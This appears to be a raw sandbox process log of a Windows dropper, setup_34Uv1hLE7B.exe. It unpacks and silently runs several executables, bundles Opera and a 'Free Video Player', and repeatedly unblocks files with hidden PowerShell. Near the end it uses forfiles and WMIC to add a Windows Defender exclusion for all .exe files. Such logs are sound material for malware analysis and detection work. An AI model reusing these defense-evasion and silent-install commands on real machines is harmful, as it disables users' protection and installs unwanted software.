"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5976 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6232 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6652 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5256 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Desktop\setup_34Uv1hLE7B.exe
"C:\Users\Admin\Desktop\setup_34Uv1hLE7B.exe"
C:\Users\Admin\AppData\Local\Temp\is-TTMLS.tmp\setup_34Uv1hLE7B.tmp
"C:\Users\Admin\AppData\Local\Temp\is-TTMLS.tmp\setup_34Uv1hLE7B.tmp" /SL5="$7020E,6120275,56832,C:\Users\Admin\Desktop\setup_34Uv1hLE7B.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "dj_minor_adequate_7161"
C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe
"C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe" 1711397ec0a91dd980a7244b5bb3ba84
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 844
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 852
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 916
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1048
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1068
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1052
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1140
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1148
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1184
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1192
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1140
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1196
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1292
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1196
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1880
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2056
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://clck.ru/3Bsi4L
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5828 -ip 5828
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffd200c3cb8,0x7ffd200c3cc8,0x7ffd200c3cd8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1764
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1852
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1816
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1760
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaService --field-trial-handle=1892,9611189713605623928,8533866165840941642,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=6476 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1824
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1948
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2056
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2088
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1928
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2136
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2184
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2220
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2204
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2160
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2156
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2248
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2208
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2116
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\XY5cJ0q5\TVCwEHwXmrhkdZhEKh.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2148
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\XY5cJ0q5\TVCwEHwXmrhkdZhEKh.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\13hJfDS0\07FQtEghQ.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\13hJfDS0\07FQtEghQ.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\h2jPqaN0\bSWFf7XkEILq.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2132
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\h2jPqaN0\bSWFf7XkEILq.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1924
C:\Users\Admin\AppData\Local\Temp\13hJfDS0\07FQtEghQ.exe
C:\Users\Admin\AppData\Local\Temp\13hJfDS0\07FQtEghQ.exe /sid=3 /pid=1090
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5828 -ip 5828
C:\Users\Admin\AppData\Local\Temp\XY5cJ0q5\TVCwEHwXmrhkdZhEKh.exe
C:\Users\Admin\AppData\Local\Temp\XY5cJ0q5\TVCwEHwXmrhkdZhEKh.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2260
C:\Users\Admin\AppData\Local\Temp\is-NM97J.tmp\TVCwEHwXmrhkdZhEKh.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NM97J.tmp\TVCwEHwXmrhkdZhEKh.tmp" /SL5="$20396,4415326,54272,C:\Users\Admin\AppData\Local\Temp\XY5cJ0q5\TVCwEHwXmrhkdZhEKh.exe"
C:\Users\Admin\AppData\Local\Temp\h2jPqaN0\bSWFf7XkEILq.exe
C:\Users\Admin\AppData\Local\Temp\h2jPqaN0\bSWFf7XkEILq.exe --silent --allusers=0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5828 -ip 5828
C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe
"C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe" -i
C:\Users\Admin\AppData\Local\Temp\7zS061095BA\setup.exe
C:\Users\Admin\AppData\Local\Temp\7zS061095BA\setup.exe --silent --allusers=0 --server-tracking-blob=YmMwZGU2YjFhMjE3MTZiMzEwY2M0NzBlZTIxNGFhNDcwNTg0YzMxOTI2ZmUxNGRkOGI3MDY4OThlMWQ4YjdhNTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInRpbWVzdGFtcCI6IjE3MjExMDY5MDIuMzA1NCIsInVzZXJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTguMC4wLjAgU2FmYXJpLzUzNy4zNiIsInV0bSI6eyJjYW1wYWlnbiI6Im9wMTMyIiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoiUlNUUCJ9LCJ1dWlkIjoiZjkxODMwYzItOTFkNS00YTEwLWJkOWUtZjM5MDA3ZTEzMGU2In0=
C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe
"C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe" -s
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1884
C:\Users\Admin\AppData\Local\Temp\7zS061095BA\setup.exe
C:\Users\Admin\AppData\Local\Temp\7zS061095BA\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x33c,0x340,0x344,0x318,0x348,0x71b8b1f4,0x71b8b200,0x71b8b20c
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2176
C:\Users\Admin\AppData\Local\Temp\7zS061095BA\setup.exe
"C:\Users\Admin\AppData\Local\Temp\7zS061095BA\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=5752 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240716051509" --session-guid=e1474dd1-4685-48e3-9e00-fdb95a4141cc --server-tracking-blob=MzkyMjU2OWQ5ODZmOTQwNjg2YWM2M2RhODc1MjQ3ODAyYjY2MTZiNTEzNWRkZDk2ZTQ4MjNlNDQzZTFhYzI1Mzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjExIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcyMTEwNjkwMi4zMDU0IiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExOC4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoib3AxMzIiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJSU1RQIn0sInV1aWQiOiJmOTE4MzBjMi05MWQ1LTRhMTAtYmQ5ZS1mMzkwMDdlMTMwZTYifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=4C06000000000000
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1672
C:\Users\Admin\AppData\Local\Temp\7zS061095BA\setup.exe
C:\Users\Admin\AppData\Local\Temp\7zS061095BA\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x32c,0x330,0x334,0x308,0x338,0x70ffb1f4,0x70ffb200,0x70ffb20c
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2148
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2176
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2148
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1988
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1932
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1852
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 2140
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\RQPXR0N3\2WsCboUrj.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5828 -ip 5828
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\RQPXR0N3\2WsCboUrj.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1080
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515091\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515091\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe"
C:\Users\Admin\AppData\Local\Temp\RQPXR0N3\2WsCboUrj.exe
C:\Users\Admin\AppData\Local\Temp\RQPXR0N3\2WsCboUrj.exe /did=757674 /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1824
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515091\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515091\assistant\assistant_installer.exe" --version
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515091\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515091\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=111.0.5168.25 --initial-client-data=0x250,0x254,0x258,0x22c,0x25c,0xa49f88,0xa49f94,0xa49fa0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1980
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5828 -ip 5828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 1964
C:\Windows\SysWOW64\Wbem\WMIC.exe
